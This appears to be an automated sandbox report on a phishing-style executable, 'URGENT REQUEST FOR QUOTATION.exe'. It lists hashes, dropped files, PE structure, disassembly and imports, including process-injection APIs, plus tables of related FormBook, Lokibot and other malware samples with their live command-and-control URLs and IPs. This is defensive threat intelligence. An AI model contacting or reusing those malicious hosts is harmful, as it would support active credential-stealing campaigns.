                                                                                                                    14:59:16API Interceptor9619939x Sleep call for process: notepad.exe modified
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    15.197.225.128FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.linkwave.cloud/l8vr/
                                                                                                                    http://icmtg.comGet hashmaliciousUnknownBrowse
                                                                                                                    • icmtg.com/
                                                                                                                    http://fullbodyburialsatsea.netGet hashmaliciousUnknownBrowse
                                                                                                                    • fullbodyburialsatsea.net/
                                                                                                                    http://aheroestribute.org/Get hashmaliciousUnknownBrowse
                                                                                                                    • aheroestribute.org/
                                                                                                                    SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.airbatchnow.online/61ud/
                                                                                                                    http://www.cordelloaks.comGet hashmaliciousUnknownBrowse
                                                                                                                    • www.cordelloaks.com/
                                                                                                                    firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 15.197.225.128/
                                                                                                                    firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 15.197.225.128/
                                                                                                                    firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 15.197.225.128/
                                                                                                                    knGrd6Wv3Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.fwbsmg.life/v15n/?o0D=OdIi350WXccHEqv996KO+lj0XHKkx2sKVd8QPYT49HZpepf4u0nSKrpUonI/yiTM9QpJUfHPRA==&pPl=OvTdJt
                                                                                                                    199.192.21.169FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.technectar.top/ghvt/
                                                                                                                    NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.tophm.xyz/30rz/
                                                                                                                    lPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.zenscape.top/d8cw/
                                                                                                                    Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.zenscape.top/d8cw/
                                                                                                                    8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.cenfresh.life/6iok/
                                                                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.selftip.top/85su/
                                                                                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.technectar.top/ghvt/
                                                                                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.selftip.top/85su/
                                                                                                                    RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.zenscape.top/d8cw/
                                                                                                                    Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.zenscape.top/d8cw/
                                                                                                                    188.114.97.3A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.awarnkishesomber.space/rmi6/
                                                                                                                    18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.timizoasisey.shop/3p0l/
                                                                                                                    lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                                    • touxzw.ir/alpha2/five/fre.php
                                                                                                                    Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                    • paste.ee/d/vdlzo
                                                                                                                    Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.bayarcepat19.click/g48c/
                                                                                                                    zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                                                    • touxzw.ir/alpha2/five/fre.php
                                                                                                                    rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.launchdreamidea.xyz/2b9b/
                                                                                                                    rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                                                    • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                                                    PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                                                    SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                                                    • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 172.64.41.3
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    SecuriteInfo.com.Win64.CrypterX-gen.2448.5331.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 172.67.74.152
                                                                                                                    SecuriteInfo.com.Win64.CrypterX-gen.23557.8276.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 104.26.12.205
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.1991.8598.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 104.26.13.205
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exeGet hashmaliciousMicroClipBrowse
                                                                                                                    • 172.67.19.24
                                                                                                                    https://studla.b-cdn.net/mine/carted/delta/chaloos.zipGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.79.109
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    creditcard.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 104.26.13.205
                                                                                                                    TANDEMUSspc.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 15.196.180.205
                                                                                                                    nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                                                                                                                    • 15.197.204.56
                                                                                                                    bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                    • 15.197.204.56
                                                                                                                    HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                    • 15.197.204.56
                                                                                                                    https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                                                                    • 15.197.193.217
                                                                                                                    FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 15.197.225.128
                                                                                                                    BbkbL3gS6s.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 15.197.137.111
                                                                                                                    Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 15.197.193.217
                                                                                                                    Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 15.197.148.33
                                                                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 15.211.66.93
                                                                                                                    NAMECHEAP-NETUSNew Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                    • 162.0.225.218
                                                                                                                    6724f91d7b548.vbsGet hashmaliciousUnknownBrowse
                                                                                                                    • 198.54.116.219
                                                                                                                    #U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.htaGet hashmaliciousUnknownBrowse
                                                                                                                    • 198.54.116.219
                                                                                                                    6724c67fe2634.vbsGet hashmaliciousUnknownBrowse
                                                                                                                    • 192.64.117.206
                                                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 199.188.200.195
                                                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 199.188.200.195
                                                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 199.188.200.195
                                                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 199.188.200.195
                                                                                                                    NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 162.0.231.203
                                                                                                                    FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.192.21.169
                                                                                                                    AS-REGRUNew Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 31.31.196.17
                                                                                                                    Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 31.31.196.17
                                                                                                                    INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.58.112.174
                                                                                                                    SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 31.31.196.17
                                                                                                                    splmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 194.87.107.181
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\SysWOW64\notepad.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):288768
                                                                                                                    Entropy (8bit):7.992818900455797
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:6144:+VAGRvrDDRzr2F+JEZ3XvppCPRWxa5eT9gyCZCt5X01p050bFN1F:CRvrDhy+JEpLYRkwZTTb5F
                                                                                                                    MD5:CABDE72DCB3E821297C65DE832B83BCE
                                                                                                                    SHA1:73E0933795B0E66378520E3DB895E375F2802274
                                                                                                                    SHA-256:A509FF65298FA21B5075E26EFF92E5E18E0D7E893F4AA8B224EF5428AB88B503
                                                                                                                    SHA-512:BF9D7B7AE46000711364F2C575214D6FD6ECEFD26B2583D88F4DE4489D90F7CDA0E26A8A93E339C60445D4052C39C6097D5F96FC9EFE9944F48D69E04F0F9416
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:..w..5X1Fi..K...p.5[...c0J...2LB5X1F1K3BPQM2LB5X1F1K3BPQM2L.5X1H..=B.X...Cy...Y"@b #"U>#XxR'_%\6p3(.>7[xX(..|.p<"V)l8U;b1K3BPQMKMK.eQ!.vS%.l-U.X...|Q,.X....,%.B...wS%..$Q$.U?.F1K3BPQMb.B5.0G1...QM2LB5X1.1I2IQZM2.F5X1F1K3BP.^2LB%X1FAO3BP.M2\B5X3F1M3BPQM2LD5X1F1K3B UM2NB5X1F1I3..QM"LB%X1F1[3B@QM2LB5H1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3l$45FLB5leB1K#BPQ.6LB%X1F1K3BPQM2LB5x1FQK3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5X1F1K3BPQM2LB5
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.407556772213375
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:URGENT REQUEST FOR QUOTATION.exe
                                                                                                                    File size:1'594'368 bytes
                                                                                                                    MD5:3e669448cc820c7782ea383da5dfc6cd
                                                                                                                    SHA1:ace1ec9a1046ad2e8517318197f4b3e1fdb494ed
                                                                                                                    SHA256:276191052d2f1d5e9b3d86239b82231f250565fd5401d240227b1c16ba966f87
                                                                                                                    SHA512:0c49d75d2f833c27d2244564d6242256d798460867677a9e3d13cf65053f1284752f14b1cc363be742721aea11d835f43a9bbe7dae3b739e2971d8d7a6c35d7d
                                                                                                                    SSDEEP:24576:UqDEvCTbMWu7rQYlBQcBiT6rprG8aQusD4fKLjDD9V4j1iQ3GaS+H08hRG//:UTvC/MTQYxsWR7aQugfDZij1vBJ0OQ
                                                                                                                    TLSH:4175E00273D1C022FF9B92334F9AF6515BBC6A260123E61F13A81979BD705B1563E7A3
                                                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                                    Icon Hash:aaf3e3e3938382a0
                                                                                                                    Entrypoint:0x420577
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x6722CA8F [Thu Oct 31 00:08:47 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                                    Instruction
                                                                                                                    call 00007EFC28E1C353h
                                                                                                                    jmp 00007EFC28E1BC5Fh
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push esi
                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                    mov esi, ecx
                                                                                                                    call 00007EFC28E1BE3Dh
                                                                                                                    mov dword ptr [esi], 0049FDF0h
                                                                                                                    mov eax, esi
                                                                                                                    pop esi
                                                                                                                    pop ebp
                                                                                                                    retn 0004h
                                                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                                                    mov eax, ecx
                                                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                                                                    ret
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push esi
                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                    mov esi, ecx
                                                                                                                    call 00007EFC28E1BE0Ah
                                                                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                                                                    mov eax, esi
                                                                                                                    pop esi
                                                                                                                    pop ebp
                                                                                                                    retn 0004h
                                                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                                                    mov eax, ecx
                                                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                                                                    ret
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push esi
                                                                                                                    mov esi, ecx
                                                                                                                    lea eax, dword ptr [esi+04h]
                                                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                                                    and dword ptr [eax], 00000000h
                                                                                                                    and dword ptr [eax+04h], 00000000h
                                                                                                                    push eax
                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                    add eax, 04h
                                                                                                                    push eax
                                                                                                                    call 00007EFC28E1E9FDh
                                                                                                                    pop ecx
                                                                                                                    pop ecx
                                                                                                                    mov eax, esi
                                                                                                                    pop esi
                                                                                                                    pop ebp
                                                                                                                    retn 0004h
                                                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                                                                    push eax
                                                                                                                    call 00007EFC28E1EA48h
                                                                                                                    pop ecx
                                                                                                                    ret
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push esi
                                                                                                                    mov esi, ecx
                                                                                                                    lea eax, dword ptr [esi+04h]
                                                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                                                    push eax
                                                                                                                    call 00007EFC28E1EA31h
                                                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                                                    pop ecx
                                                                                                                    Programming Language:
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xae870.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1830000x7594.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xd40000xae8700xaea008b2c9bafed6e2a58d3e2af29fc92175bFalse0.9622978368826056data7.961177050767744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x1830000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                    RT_RCDATA0xdc7b80xa5b36data1.0003182507993105
                                                                                                                    RT_GROUP_ICON0x1822f00x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                    RT_GROUP_ICON0x1823680x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0x18237c0x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0x1823900x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0x1823a40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                    RT_MANIFEST0x1824800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
